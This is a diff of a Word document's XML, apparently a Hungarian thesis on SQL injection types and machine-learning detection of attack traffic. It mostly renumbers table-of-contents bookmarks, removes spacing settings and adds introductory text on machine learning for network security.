-      <w:bookmarkStart w:id="1" w:name="_Toc70961896"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71019988"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -739,7 +739,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc70961897"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71019989"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1457,7 +1457,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc70961898"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc71019990"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1483,7 +1483,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1510,7 +1509,7 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc70961896" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019988" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1538,7 +1537,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961896 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019988 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1575,7 +1574,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1584,7 +1582,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961897" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019989" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1612,7 +1610,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961897 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019989 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1649,7 +1647,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1658,7 +1655,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961898" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019990" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1686,7 +1683,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961898 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019990 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1723,7 +1720,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1732,7 +1728,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961899" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019991" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1760,7 +1756,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961899 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019991 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1798,7 +1794,6 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1807,7 +1802,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961900" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019992" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1851,7 +1846,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961900 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019992 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1889,7 +1884,6 @@
               <w:tab w:val="left" w:pos="880"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1898,7 +1892,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961901" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019993" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1944,7 +1938,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961901 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019993 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1982,7 +1976,6 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -1991,7 +1984,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961902" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019994" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2035,7 +2028,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961902 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019994 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2073,7 +2066,6 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2082,7 +2074,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961903" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019995" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2126,7 +2118,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961903 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019995 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2164,7 +2156,6 @@
               <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2173,7 +2164,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961904" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019996" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2217,7 +2208,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961904 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019996 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2255,7 +2246,6 @@
               <w:tab w:val="left" w:pos="880"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2264,7 +2254,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961905" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019997" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2310,7 +2300,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961905 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019997 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2348,7 +2338,6 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2357,7 +2346,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961906" w:history="1">
+          <w:hyperlink w:anchor="_Toc71019998" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2401,7 +2390,189 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961906 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019998 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71019999" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>2.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Felügyelt tanulás</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71019999 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc71020000" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>2.1.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Naive Bayes</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020000 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2439,7 +2610,6 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2448,7 +2618,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961907" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020001" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2492,7 +2662,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961907 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020001 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2530,7 +2700,6 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2539,7 +2708,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961908" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020002" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2583,7 +2752,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961908 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020002 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2620,7 +2789,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2629,7 +2797,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961909" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020003" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2657,7 +2825,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961909 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020003 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2694,7 +2862,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2703,7 +2870,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961910" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020004" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2731,7 +2898,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961910 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020004 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2768,7 +2935,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
-            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
@@ -2777,7 +2943,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70961911" w:history="1">
+          <w:hyperlink w:anchor="_Toc71020005" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2805,7 +2971,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70961911 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71020005 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2886,7 +3052,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc70961899"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc71019991"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3206,7 +3372,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc70961900"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc71019992"/>
       <w:r>
         <w:t>SQL INJECTION</w:t>
       </w:r>
@@ -3702,7 +3868,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc70961901"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc71019993"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3728,7 +3894,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc70961902"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc71019994"/>
       <w:r>
         <w:t>Sávon belüli</w:t>
       </w:r>
@@ -4564,7 +4730,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc70961903"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc71019995"/>
       <w:r>
         <w:t>Vak (</w:t>
       </w:r>
@@ -5294,7 +5460,7 @@
         <w:pStyle w:val="Stlus3"/>
         <w:ind w:left="709" w:hanging="709"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc70961904"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc71019996"/>
       <w:r>
         <w:t>Sávon kívüli (</w:t>
       </w:r>
@@ -5670,7 +5836,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc70961905"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc71019997"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6147,13 +6313,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6199,6 +6359,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
@@ -6563,6 +6724,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
@@ -6790,7 +6952,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc70961906"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71019998"/>
       <w:r>
         <w:t>GÉPI TANULÁS</w:t>
       </w:r>
@@ -6801,6 +6963,355 @@
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Mi a gépi tanulás?</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A gépi tanulás az adatok mintázatának automatikus felfedezésének technikája.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>álózati biztonsági kontextusban a gépi tanulást használják arra, hogy meghatározzák a hálózati forgalom támadásként vagy normál forgalomként történő besorolásának legpontosabb és leghatékonyabb módját a digitális eszközök legjobb védelme érdekében</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Hogyan működik a gépi tanulás? (4)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A gépi tanulás (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vagy modell) felépítésének négy alapvető lépése van</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Gépi tanulási módszerek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
